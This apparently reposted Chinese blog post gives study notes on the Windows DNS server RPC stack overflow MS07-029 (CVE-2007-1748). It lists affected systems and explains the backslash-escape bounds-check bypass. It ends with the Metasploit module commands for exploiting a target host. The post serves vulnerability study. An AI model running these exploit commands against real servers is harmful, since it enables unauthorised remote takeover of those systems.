ms07-029漏洞学习

漏洞描述
ms07-029是一个远程执行代码漏洞,成功利用此漏洞的×××者可以远程完全控制受影响的系统。 ×××者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
漏洞编号
CVE-2007-1748
BID-23470
×××目标及端口
DNS服务器
端口:需要自行确定
影响系统
    Microsoft Windows 2000 Server Service Pack 4 
    Microsoft Windows Server 2003 Service Pack 1
    Microsoft Windows Server 2003 Service Pack 2
    Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
    Microsoft Windows Server 2003 with SP2 for Itanium-based Systems
    Microsoft Windows Server 2003 x64 Edition
    Microsoft Windows Server 2003 x64 Edition Service Pack 2
漏洞成因及原理
成因:Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。
原理:DNS RPC接口用来将域名转换为IP地址,如果接收到含有反斜线+八进制的字符,会导致栈溢出。设计的函数为Lookup_ZoneTreeNodeFromDottedName(),函数中在将数据写入缓冲区前进行了一些边界检查,但是通过含有多个反斜线的字符串便可以绕过检查触发漏洞。
metasploit exp可用目标
Windows 2000 SP0-SP4
Windows 2003 SP0-SP2
metasploit利用ms07-029
# 利用此payload需要locale、rhost、rpost三项内容,分别为:目标系统的语言、目标系统IP和目标系统DNS服务端口。
use exploit/windows/dcerpc/ms07_029_msdns_zonename
set rhost <target ip>
set rport <target port>
run -j
不使用metasploit利用ms07-029
暂未发现,后续补充
参考文章

绿盟ms07-029漏洞研究
微软官方ms07-029报告

转载于:https://blog.51cto.com/executer/2174867

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值